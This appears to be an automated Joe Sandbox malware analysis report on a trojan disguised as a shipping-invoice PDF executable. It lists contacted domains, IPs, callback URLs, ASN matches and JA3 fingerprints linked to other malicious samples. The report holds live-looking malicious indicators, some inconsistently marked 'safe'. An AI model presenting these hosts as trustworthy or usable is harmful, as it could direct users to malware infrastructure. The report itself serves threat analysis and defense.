http://www.soarlikeaneagle.site/s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
http://www.teslafreesuperchargermiles.com/s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
http://www.hara.cloud/s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp	0%	Avira URL Cloud	safe
http://www.musee-radix-hairsalon.com/s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
http://www.celsb.com/s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
www.papllc.biz/s3f1/	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.4mtechmachines.com/s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp	0%	Avira URL Cloud	safe
http://www.izivente.com/s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
http://www.mvsteals.com/s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
http://www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.thaicharuen.com	107.178.157.225	true	true	unknown
4mtechmachines.com	184.168.98.97	true	true	unknown
hara.cloud	34.102.136.180	true	false	unknown
www.musee-radix-hairsalon.com	183.181.99.12	true	true	unknown
www.celsb.com	154.94.229.8	true	true	unknown
www.izivente.com	64.190.62.111	true	true	unknown
teslafreesuperchargermiles.com	34.102.136.180	true	false	unknown
mvsteals.com	34.102.136.180	true	false	unknown
soarlikeaneagle.site	70.40.220.123	true	true	unknown
drive.google.com	142.250.185.110	true	false	high
teespring.netlifyglobalcdn.com	35.198.112.85	true	false	unknown
www.evaccines.com	3.64.163.50	true	true	unknown
googlehosted.l.googleusercontent.com	142.250.186.97	true	false	high
www.federal-funds-deposit.com	unknown	unknown	true	unknown
www.safety1-venture.us	unknown	unknown	true	unknown
www.4mtechmachines.com	unknown	unknown	true	unknown
www.facebook-meta-morphosis.com	unknown	unknown	true	unknown
doc-14-5s-docs.googleusercontent.com	unknown	unknown	false	high
www.teslafreesuperchargermiles.com	unknown	unknown	true	unknown
www.mvsteals.com	unknown	unknown	true	unknown
www.hara.cloud	unknown	unknown	true	unknown
www.papllc.biz	unknown	unknown	true	unknown
www.eggchanceapple.top	unknown	unknown	true	unknown
www.bncmobile.com	unknown	unknown	true	unknown
www.morningstarapparel.space	unknown	unknown	true	unknown
www.soarlikeaneagle.site	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download	false		high
http://www.thaicharuen.com/s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP	true	Avira URL Cloud: safe	unknown
http://www.soarlikeaneagle.site/s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP	true	Avira URL Cloud: safe	unknown
http://www.teslafreesuperchargermiles.com/s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP	false	Avira URL Cloud: safe	unknown
http://www.hara.cloud/s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp	false	Avira URL Cloud: safe	unknown
http://www.musee-radix-hairsalon.com/s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP	true	Avira URL Cloud: safe	unknown
http://www.celsb.com/s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP	true	Avira URL Cloud: safe	unknown
www.papllc.biz/s3f1/	true	Avira URL Cloud: safe	low
http://www.4mtechmachines.com/s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp	true	Avira URL Cloud: safe	unknown
http://www.izivente.com/s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP	true	Avira URL Cloud: safe	unknown
http://www.mvsteals.com/s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP	false	Avira URL Cloud: safe	unknown
http://www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmp	false		high
https://word.office.com	explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://doc-14-5s-docs.googleusercontent.com/%%doc-14-5s-docs.googleusercontent.com	Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816989245.00000000008D8000.00000004.00000020.sdmp	false		high
https://powerpoint.office.come	explorer.exe, 00000007.00000000.22984417636.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22754900142.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654737060.000000000D4F4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-14-5s-docs.googleusercontent.com/tography	Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	false		high
https://doc-14-5s-docs.googleusercontent.com/	Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander	NETSTAT.EXE, 00000008.00000002.26929375069.00000000039BF000.00000004.00020000.sdmp	false		high
https://excel.office.com	explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	false		high
http://www.foreca.com	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
http://schemas.micro	explorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	false		high
https://aka.ms/odirm	explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://www.msn.com/?ocid=iehp	explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://drive.google.com/	Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp	false		high
https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt6	Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	false		high
https://www.msn.com/de-ch/?ocid=iehp	explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp	false		high
https://api.msn.com/	explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp	false		high
https://api.msn.com/v1/News/Feed/Windows?apikey=a	explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp	false		high
https://windows.msn.com:443/shell	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://www.msn.com/?ocid=iehpA	explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
70.40.220.123	soarlikeaneagle.site	United States	46606	UNIFIEDLAYER-AS-1US	true
154.94.229.8	www.celsb.com	Seychelles	32708	ROOTNETWORKSUS	true
183.181.99.12	www.musee-radix-hairsalon.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
184.168.98.97	4mtechmachines.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
34.102.136.180	hara.cloud	United States	15169	GOOGLEUS	false
142.250.185.110	drive.google.com	United States	15169	GOOGLEUS	false
64.190.62.111	www.izivente.com	United States	11696	NBS11696US	true
107.178.157.225	www.thaicharuen.com	United States	26658	HENGTONG-IDC-LLCUS	true
3.64.163.50	www.evaccines.com	United States	16509	AMAZON-02US	true
142.250.186.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
35.198.112.85	teespring.netlifyglobalcdn.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	527894
Start date:	24.11.2021
Start time:	15:04:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Arrival Notice, CIA Awb Inv Form.pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/1@23/11
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 61% Number of executed functions: 71 Number of non-executed functions: 63
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.54.122.82, 51.105.236.244 Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wdcp.microsoft.com, nexusrules.officeapps.live.com, arc.msn.com, wd-prod-cp.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
64.190.62.111	VSL_MV SEA-BLUE SHIP OWNERS.exe	Get hash	malicious	Browse	www.nft2dollar.com/e8ia/?m0D8S=cRcPqDD8gRHP&3f0LiN=GnXHaya5a2eUgv0WruAXx1t7Zy7Y+CgMkaSmHXdRLE9D7kdhxI3EIeUSBdU4I7rnjaf8
	DRAFT CI,PL,BL.xlsx	Get hash	malicious	Browse	www.izivente.com/s3f1/?3fcxyBj0=PTZX9bbD2H3/eSLZCimGk0mts24461Z1qQt3uJtp3urdJLalWM2taAbNKzkqfQ9DezYskQ==&gr0=YJBp
	202111161629639000582.exe	Get hash	malicious	Browse	www.bfjchonn.com/wkgp/?4h5=r5bTipvL1HTTWJiBtp2K8HnZFDU224i7HTxLWa9c2vsP4zdxhg+H0Im5NRGa4PGcfm+i&BTz=9rWdJt
	Offer quotation2021.xlsx	Get hash	malicious	Browse	www.xrgoods.com/yrcy/?6l=o8-xnJRXvfWl_47P&F2MtYz0H=ucfXCxnpvv5Tz8Xk/vwH4BguhZh3+/Q/1elD1okmLu9zvHthbeyS8MDlxYeDFFmWsSnHeQ==
	50% TT advance copy.doc	Get hash	malicious	Browse	www.solarpanelquote.space/xgmi/?OL=ybl0d27x&4hiLpToh=R40g5FCe/tl63Chpu0Qx+jb3BAlOBjU3GjWWTVYU0rZXCAGDgsAHqIO3R/E5Na38rBXbVw==
	e5obiX3KpV.exe	Get hash	malicious	Browse	www.solarpanelquote.space/xgmi/?1bvpdV=R40g5FCb/ql+3Stls0Qx+jb3BAlOBjU3GjOGPWEVwLZWCxqFn8RL8M21SaovJKzPgCKr&K0D0u=d48luxV8if90
	38566F9A331BB8503835D7ABFDC027D9D3FA45C65F388.exe	Get hash	malicious	Browse	jayp.eu/loki/fre.php
	rEC0x536o5.exe	Get hash	malicious	Browse	www.izivente.com/s3f1/?XZeT=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&_dIpGp=dTiPIlmXgVLtX
	Order RFQ#2021-16-11.exe	Get hash	malicious	Browse	www.securityleaderboard.com/y7n5/?X2MLR0Kx=ZfjAO2cD3Pnxf5rX5s/lIosAd5PEZrgbRd/L4aWDkUxXEvujBB7ELJjM5g0yEcfltYO/&qXtd=5ji4dxg8AFFDPP80
	Tax payment invoice - Wd, November 17, 2021,pdf.exe	Get hash	malicious	Browse	www.eaujeunetuesunique.com/e3rs/?7n=0lMJyNabEIuqOIYu6FENlOu3MaEwRpRqACIVbnuNhXgO7wan67zzeCUSx/HLaRSQ/RIP&q0DXK=OR-p4BxxYZ
	Draft CI,PL,BL.xlsx	Get hash	malicious	Browse	www.izivente.com/s3f1/?xh=PTZX9bbD2H3/eSLZCimGk0mts24461Z1qQt3uJtp3urdJLalWM2taAbNKzkqfQ9DezYskQ==&yPxd=6l5T8Vu872r0J6v
	Company Profile.exe	Get hash	malicious	Browse	www.ontracgps.com/dc02/?1bNDudv=AmP/SaMbbZ2MIsYUXXuAR7hhieN2CbGMERDVdX17LUO7+kzhSWd5nHgK7d6p7jfv+JAn&Tp=NBZl4DOPndid
	rgQlelmw0H.exe	Get hash	malicious	Browse	www.merxeduct.com/kzk9/?z8wprNM=WzyfFTwXrFBJoP9SBal/6McArMezXX4+T8rZ3lhz2mZqtx3XZtnMDX8QvpDBUs1Bvhc7&-Zc4t=R48HBZJ8-T
	INV8897.xlsx	Get hash	malicious	Browse	www.gaia32.com/scb0/?cHJ=5jU8GjA0BTltmzO0&9r=xqFzn59bvK9qKZW7X3IG0iZJd+zA8VWjiYtamAXhuVGruAibW5S1Hm5/cVQZ9j65xMUZ8Q==
	Company profile.exe	Get hash	malicious	Browse	www.skindefense5.com/xzes/?r8Rd2=nzYmw7ObxngERypQ/m2S0s66JIboZ9taw8WhBad2s6KK3jGmAKDva9FwOPgQcjJO5ysj&q8z=h6Opkv6H1zQxJb1p
	RFQ 38383090.exe	Get hash	malicious	Browse	www.spaceameseu.xyz/p0on/?Ql=9ri8&4hhHazLH=O9eInfgFV8/v8l+wYbQzCWGHyl4wGPzJrAtqjnpoJ5MKj1GvSLXJ6XtzXEu9OAFzkHbf
	PURCHASE ORDER NO.ATPL_PO_21115_05687537_2021-22.exe	Get hash	malicious	Browse	www.bfjchonn.com/wkgp/?9rzh=r5bTipvL1HTTWJiBtp2K8HnZFDU224i7HTxLWa9c2vsP4zdxhg+H0Im5NRGa4PGcfm+i&2doHP=jZbXp
	Vergi #U00f6deme faturas#U0131 9 Kas#U0131m 2021 Sal#U0131,pdf.exe	Get hash	malicious	Browse	www.eaujeunetuesunique.com/e3rs/?5j_Xr=0lMJyNabEIuqOIYu6FENlOu3MaEwRpRqACIVbnuNhXgO7wan67zzeCUSx/HLaRSQ/RIP&4he=4hiXNDW
	New order #1138.xlsx	Get hash	malicious	Browse	www.mambacustomboats.com/fqiq/?cz=oM7C4s4P9Tx5NE8K/7tedYlymorHgm5Kv3M2/2amrfi4uqOFLGFzoT7deI7S8+ml3DPmrQ==&Mx=OTAd
	Drawing & Company Profile.exe	Get hash	malicious	Browse	www.spaceameseu.xyz/fg6s/?ETwT=0BZxk6DhNH3LdJ&Nhoxs4=nA5tULqkrawt9pEoOlQQfR/faELPy2pLoS6J6NMTjgTyPZXVoDl3YIO7hrV6abifMfON

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.evaccines.com	rEC0x536o5.exe	Get hash	malicious	Browse	3.64.163.50
www.izivente.com	DRAFT CI,PL,BL.xlsx	Get hash	malicious	Browse	64.190.62.111
	rEC0x536o5.exe	Get hash	malicious	Browse	64.190.62.111
	Draft CI,PL,BL.xlsx	Get hash	malicious	Browse	64.190.62.111

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	t 2021.HtML	Get hash	malicious	Browse	192.185.129.43
	New Order778880.exe	Get hash	malicious	Browse	192.185.167.112
	IyRUJT27dd.exe	Get hash	malicious	Browse	192.185.113.96
	LlDlHiVEJQ.exe	Get hash	malicious	Browse	162.241.24.173
	bomba.arm	Get hash	malicious	Browse	162.144.165.114
	PAYMENT COPY FOR YOUR INFORMATION $76,956.exe	Get hash	malicious	Browse	192.185.129.69
	Balance.xls	Get hash	malicious	Browse	192.185.113.96
	EDYMAN ORDER.vbs	Get hash	malicious	Browse	162.241.148.206
	Scan docs. pdf..................exe	Get hash	malicious	Browse	108.179.232.76
	$24,000.00USD.payment.pdf.Gz.exe	Get hash	malicious	Browse	162.241.169.155
	Pago.xls	Get hash	malicious	Browse	192.185.113.96
	ZXfpm4fw0q.exe	Get hash	malicious	Browse	192.185.113.96
	vbc (1).exe	Get hash	malicious	Browse	192.185.5.49
	wYW5AsM930.exe	Get hash	malicious	Browse	192.185.17.130
	vbc.exe	Get hash	malicious	Browse	108.167.189.66
	oLoXpXDepS.exe	Get hash	malicious	Browse	192.185.113.96
	arm-20211123-0942	Get hash	malicious	Browse	142.5.239.185
	Payment.xls	Get hash	malicious	Browse	192.185.113.96
	DHL express 5809439160_pdf.exe	Get hash	malicious	Browse	50.87.150.131
	mDm3flTa40NBzvg.exe	Get hash	malicious	Browse	192.185.84.191
ROOTNETWORKSUS	eh.arm	Get hash	malicious	Browse	154.82.151.141
	l1z4rdsQu4D.x86	Get hash	malicious	Browse	154.27.158.217
	d8Hs7X8HGP	Get hash	malicious	Browse	154.27.246.223
	y2NMF6ulOI	Get hash	malicious	Browse	154.82.103.232
	Hilix.arm	Get hash	malicious	Browse	154.82.151.120
	document.exe	Get hash	malicious	Browse	154.82.127.19
	yXTRZQmYdr	Get hash	malicious	Browse	154.94.148.183
	Owari.arm7	Get hash	malicious	Browse	154.82.103.252
	JuihXmkZGF	Get hash	malicious	Browse	154.94.148.170
	2gRh8To5o9	Get hash	malicious	Browse	154.27.246.214
	zFDNFIXYHn	Get hash	malicious	Browse	103.211.168.19
	peach.arm	Get hash	malicious	Browse	156.236.248.47
	zgV2Uq4fmu	Get hash	malicious	Browse	156.236.225.9
	7fic3HM8I3	Get hash	malicious	Browse	156.236.225.7
	mixazed_20210816-155711.exe	Get hash	malicious	Browse	154.82.111.78
	M8XFTAqveT	Get hash	malicious	Browse	154.82.151.133
	RR8K3UpQdt	Get hash	malicious	Browse	38.240.210.8
	Qka3fi8NpL	Get hash	malicious	Browse	154.82.151.169
	Z7bNxhhS7y	Get hash	malicious	Browse	154.82.151.124

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	TT-PRIME USD242,357,59.ppam	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	chase.xls	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	Statement from QNB.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	private-1915056036.xls	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	private-1910485378.xls	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	doc201002124110300200.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	t 2021.HtML	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	Justificante.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	muhammadbad.html	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	MtCsSK9TK2.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	vAsfZhw32P.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	FpYf5EGDO9.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	#U0191ACTU#U0156A_unxsxdxX_f_mMT_312.vbs	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	FhP4JYCU7J.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	ugeLMlEROB.exe	Get hash	malicious	Browse	142.250.186.97 142.250.185.110
	NtqHVU6GDV.dll	Get hash	malicious	Browse	142.250.186.97 142.250.185.110

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF37AB796C0CD232D7.TMP Download File
